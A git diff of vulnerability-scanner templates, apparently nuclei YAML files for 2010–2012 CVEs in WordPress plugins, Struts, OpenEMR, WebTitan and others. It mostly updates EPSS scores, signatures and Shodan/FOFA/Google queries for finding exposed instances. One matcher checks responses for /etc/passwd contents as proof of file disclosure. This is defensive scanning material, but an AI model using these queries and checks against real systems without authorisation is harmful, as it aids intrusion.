cve,cve2010,lfi,edb,packetstorm,modx http: @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e76f7a4d677f1d7ef95c2948ec7ed1373b61aaf7d8079dee4d600ee0124e6a80220414a9a52b2fc1f231283eec54414a71ccd7fddfadfdfd55c76cddaa64c4d10f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b69cc6b4c42025b13e1bc52d65ea1be1df0981a7add3a28408c4dc8ac8c1bb46022100dc24a3d37f2cc1e1d2ff28b81ed9bd7551744367bd64dfe547edce7f6af21976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 58bfcca251..8fb1e17633 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fb561e1ab44aaeb747e0238060527aad3bc02b20463ff0f288bc3d2ae95c3ff022062cf30b18e1bd5e1990e6fc55e60e0752092d76ff94a15f6061a6f373e4c3945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc54ac25bae7f3d0876f30aa9fb8800f5d6c36ad89fbdc467b19abe6adce7ee102210097102e3aa4222ba9586f8537a69a955c66fa6e99b7e017c1fab3fb3287ccedc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index f97802ff95..4d7dc872a1 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - epss-score: 0.96615 - epss-percentile: 0.99548 + epss-score: 0.8814 + epss-percentile: 0.98672 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c46ac4d506d810715279cb2fc743fd7a9e3113cfb0b8d83b32f1481e48f48c2c0221008f18720cfdf2ca2a4860386a4b10dfdae5296fbf17f1496b8d0ec261ff5e0156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 4ca77e7694..fee3761067 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89875 + epss-percentile: 0.90858 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220494970bc2de72594ab8da27efeb9427a0eba928ba7e49b4eb191b682bda14ad1022100905b334c25e0b7169d2adbb77e2f68f49d388a46f12a9a13291a7e5a035fe981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a3a16abfd5e11d1d7f96f96005d87bed6cb9df43c8c426cd34e9e332f6c348f0220461e34bf597e44608514e2eadf691fdb5beb7e0c07458b4632983c5725493ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3019f09e60..731de64f2d 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.86842 + epss-percentile: 0.87103 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220754b4ba2abae3c78a2e9e383db1f8a5610313a788aa30bae90556556e31a85d20221009bd64e51d469c11e836eb02211169a9efd4322295b411e2a9afe0f9efa702fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009040bc705006390698b4760bf5d68599fa44e8cd4d06e85d1c53f6d78a66bd9022100dad78daa7c9a9543e18b8cce2f178325d4a18cf5db8fe2c2dab043196bea3e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index f51495187f..5e57c93228 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.91127 + epss-percentile: 0.91341 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab3340adb074a840c8283299b9fac09e4325d3a44d167aa3ac9d2827d14d49bd022100beb78853f6c850bc5953e75678cbccdce68edc349f14b91a45ad79f2eff254cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db36b1f058c7168f5f8f94f9effb32d1f4c99661d18f96567059bab4e3ec0da80220306d6b230632c77476d53991becda742dc1895da400324ad45d58f94930ed72a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index af1291bb6b..742f2d0ceb 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -24,6 +24,8 @@ info: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2011,seclists,xss,tikiwiki,tiki http: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfd21e5afe0cd33f196e0f14cec829fe42b3b88a61c23a61a2615a34e01d4e6e022100899521b740fb94ec3a62f4001cafe59c17f13519b686323a2cb449a0265b4ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 8df63641aa..1aad033b9a 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -19,17 +19,16 @@ info: cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 - epss-score: 0.00431 - epss-percentile: 0.74018 + epss-score: 0.00446 + epss-percentile: 0.74948 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: codeasily - product: grand_flagallery + product: "grand_flagallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/flash-album-gallery" + google-query: "inurl:\"/wp-content/plugins/flash-album-gallery\"" tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022003c68f4509b734115cf058165538efe2647798f41c8ab2529c8a37ac87adf97502207f242403d316394c9ba49f4394fec2656568c19d07c6d98ce47089acb541779e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025cc6e30cb84746f0baa76f17d04c386fddbc7463f4c2c48735fcff774d37130022065c6a4fdf9b90082d6cd52d6649fed276399c92ff4e218a6b6a0f54e9b9ee78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 369e9bebd4..0b0a09610d 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -14,12 +14,19 @@ info: cvss-score: 4 cve-id: CVE-2011-4640 cwe-id: CWE-22 - cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:* + epss-score: 0.05544 + epss-percentile: 0.93225 + cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: spamtitan vendor: spamtitan - shodan-query: title:"WebTitan" + product: webtitan + shodan-query: + - title:"WebTitan" + - http.favicon.hash:1090061843 + fofa-query: + - icon_hash=1090061843 + - title="webtitan" tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated http: @@ -48,4 +55,4 @@ http: - "regex('root:.*:0:0:', body)" - 'status_code_3 == 200' condition: and -# digest: 490a00463044022003bcdf3fd8c489c4c9eb2586491ed5595a9125404ba12366de7a36e801f261ac02200c78ce5a21dff8fd612356d665f441024b862909f23324c8b5ac220196e23ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201eaffb982a68a851824728b221e93502cf81c0c339a5a281c5f9c00641db37d8022041a162a42e24f9fa8ecd4855c69a7ad4ce469e2c9264b97710267fdddb0ecaf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index e834c2ac52..135e8a4833 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - epss-score: 0.0358 - epss-percentile: 0.9073 + epss-score: 0.44913 + epss-percentile: 0.97396 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5fc8a3ec653d8fb8742134fb6a023a25f0175d8689169686dd9d21181140f0c022100b6b7a735dbecdd4eae6ec785a7a430ca8bc71649f26f8690f71819f2c3f9e3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220522c81df4d838763aea8850f058981a255d7d59675fdb4c02bbdb06969a0ad83022023f0320748d1a58fedaf54253d38c438cff763b3401e447409b7a5d3f520ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index d13526871a..28402a4db3 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01792 - epss-percentile: 0.86796 + epss-percentile: 0.88084 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: bueltge product: adminimize - google-query: inurl:"/wp-content/plugins/adminimize/" + google-query: "inurl:\"/wp-content/plugins/adminimize/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220059bc7b527414cb8f06e01a058360c21c69b8e26a37af1fc52f6b1d9806c894d022037ddaae6a037f21efaba06fccd5dda6df213960c66b2bbb410e35cb137d415c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfa76d3df3920ddf964acee2aaee72591040d36facd90b737b65f6c8b0ff3bd7022050d4e056395568421bc46fa8e9dd845d1569313207399bd8a6b6a040455c3957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index a5a828c58b..3fd885384f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.7412 + epss-percentile: 0.74554 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f0c48064742c5d41e5d5782430cbe65cfb58b1742f92b19ffbe74b895fb4a6702200800d1c7c4d52f58693af881c71484d3dc27308fcee85ac019f1d0f848653aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2d8bf5d9480ea46483ac3aaaced8689aad71b8a211c5fd6d4a46d99c8e57eb5022100a79b8aec839add3b1c2180ff47f3be3e75701ceed4efe24247d9f4b77d793ed2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index b357da58e8..3cefe3050b 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.6058 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wordpress - product: alert_before_you_post - google-query: inurl:"/wp-content/plugins/alert-before-your-post" + product: "alert_before_you_post" + google-query: "inurl:\"/wp-content/plugins/alert-before-your-post\"" tags: cve,cve2011,wordpress,xss,wp-plugin - flow: http(1) && http(2) http: @@ -61,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100900756dfcc6df6c56c912725d923b0e4907624843873d7fbba36f386e808dab00220782a401d28335add23c3b2a288a4f7a0baaae8d70301ef86c098d36b36d5bc56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d717f5eb08685f108608685c5e8bc7e0fa7b195d96e3ee4ba18a7cfd5801754702205446ddf30092518c98fa353add7e50550a3ccdeab1c121aa92ffa8245ed2642d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 2b7662c648..7d686f7ade 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.61346 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: skysa - product: skysa_app_bar_integration_plugin - google-query: inurl:"/wp-content/plugins/skysa-official/" + product: "skysa_app_bar_integration_plugin" + google-query: "inurl:\"/wp-content/plugins/skysa-official/\"" tags: cve,cve2011,wordpress,xss,wp-plugin,skysa - flow: http(1) && http(2) http: @@ -61,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a2506e8b9e69b40dd782552d8c266a500621c29093bcef9f8654764f7b7c87d0221008d4c442a6894e2c5eed83217df00622fc53439ae7005c6d5ecdef9bf9848c666:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb05c920e3e17a004105d6b5d95f1fd2d332522302f25e8537bd0ba5e8b4bfd3022100d40568d232c5343ba0286319db6b9ebb72158caccfc6888796e640014a9aa10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 968b0da94d..e1b6ffd54d 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -13,21 +13,22 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71803 + epss-percentile: 0.74451 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: clickdesk - product: clickdesk_live_support-live_chat_plugin - google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" + product: "clickdesk_live_support-live_chat_plugin" + google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk - flow: http(1) && http(2) http: @@ -61,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8eb0ed9f6f8db4abbf7cffe6f186b37ccac30d3ad38d467d9b47579b0033590022025ec9d9119baaf1bc72781bc51273b9c33f28d9eeaf791a077df27a3fa109bfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2d4487a5501ae1811586db048fdc2cb43c5981b65f2824f90665f570c9a206202202267f35270d92aa00788ea3eeb8ba6232d8fefc58bc33b6bc7f0ce3ea155c0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 9b02ab22c5..b83bdf4f2f 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00478 - epss-percentile: 0.75288 + epss-percentile: 0.75781 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: featurific_for_wordpress_project - product: featurific-for-wordpress - google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" + max-request: 2 + vendor: "featurific_for_wordpress_project" + product: "featurific-for-wordpress" + google-query: "inurl:\"/wp-content/plugins/featurific-for-wordpress\"" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project - flow: http(1) && http(2) http: @@ -62,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c6eda4cfeb3627660a657e9f29bda7dd316dd30227e621d8343d91253fde34902203a28c64036832f68f8fc4dad5d7182cb0a9ada862609f0b3caacef9e6171842a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200e7f17ca825045fd5ec22759afdf7174629b996625b9f6be48597e293f3803c3022100a587d5833d1c9bbeb989412eb4eaf65b56c5ec3b851e353fbc831063a3748fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 5c7c2d6751..67b209063c 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -19,13 +19,22 @@ info: cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - epss-score: 0.9496 - epss-percentile: 0.99239 + epss-score: 0.96232 + epss-percentile: 0.99521 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,apache,rce,struts,java,edb http: @@ -42,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a3b82c57410275caf8c35b404ffc264121702280145d21c64ba210e9567cb6bf02210090f35b30c75342562029ea63c40b3d65ffd05f8f352fb02c7684cb12de64c278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bbf86e708d5052738152ccb3c3e3644e742d29df19908a2f9e93c4d3b0ae6a7022100edc6714bc5c4a93886c03124896afd2172be7d9ababc019568c20b559bbae879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 77f250d6b7..1c83b0d3de 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -29,7 +29,16 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Struts Problem Report" + shodan-query: + - html:"Struts Problem Report" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" @@ -50,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202dd8c1c47f988e352064f8076ab0213428202922a2ea124638b4e3c9b9b19c6f02200ec32d17a3e91604e9741f85056d40220c143b9849ff66124b453479caa640a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 32cf37a74b..736305b9e2 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 - epss-score: 0.02262 - epss-percentile: 0.88456 + epss-score: 0.01844 + epss-percentile: 0.883 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206799f52e48485817e413edc30bd4f359218ec597770780417e46ddcd8b00e00602207a128007973d0e474c073c18ad434eb21153116741ec63ad256b3e003bae78cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index e118e248b0..0773a1bb36 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -14,21 +14,21 @@ info: - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59612 + epss-score: 0.00223 + epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: attenzione product: yousaytoo - google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" + google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione - flow: http(1) && http(2) http: @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6fd6920f74970c98524bd8c651ad2bfe51d737265c753018e90239927092d5602210095be05e1174dcc1fabe44d3f68fe3f19026ddf9d8d6a66b9246fd64b1e5a0f6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b2f43506a8..904bfb7219 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - http://www.exploit-db.com/exploits/18435 - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - epss-score: 0.02053 - epss-percentile: 0.8779 + epss-score: 0.01277 + epss-percentile: 0.85703 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c6a4cabb72bde21bb132b44816b1bd64c1146b68963391fc45f78f2a847cb35022100eba1ae097bcc852f6d363e8f7d8fd65ced366197f06c5f1967617a378dd2752f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 4742dede6e..72b7c54fd1 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -20,13 +20,23 @@ info: cvss-score: 3.5 cve-id: CVE-2012-0991 cwe-id: CWE-22 - epss-score: 0.81788 - epss-percentile: 0.98116 + epss-score: 0.72743 + epss-percentile: 0.98084 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openemr product: openemr + shodan-query: + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" + google-query: intitle:"openemr" tags: cve,cve2012,lfi,openemr,traversal,edb http: @@ -43,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c52d46badf6a9fb78ec08f5843c6acb660464e72ff79d7e8dc3268397c230d7e022005a1350eca603c0af65ba683420f8fab2f5d2173423b75a641d4e8a3d07db191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 3b63c970e3..4c49828d04 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - epss-score: 0.02194 - epss-percentile: 0.89179 + epss-score: 0.03648 + epss-percentile: 0.91695 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3a84923297dce515a989c9a43b3bee4c8f3c31fdfb93e2d763a77022f59bf51022061e6935843ad22eb54f312956180a70d53cc44408b116d5002ef457535087934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index b50c53d3e2..0a9a358534 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -19,13 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - epss-score: 0.10469 - epss-percentile: 0.94495 + epss-score: 0.09636 + epss-percentile: 0.94766 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr product: dolibarr_erp\/crm + shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve,cve2012,lfi,dolibarr,traversal,edb http: @@ -42,4 +44,4 @@ http: - type: status status: - 200 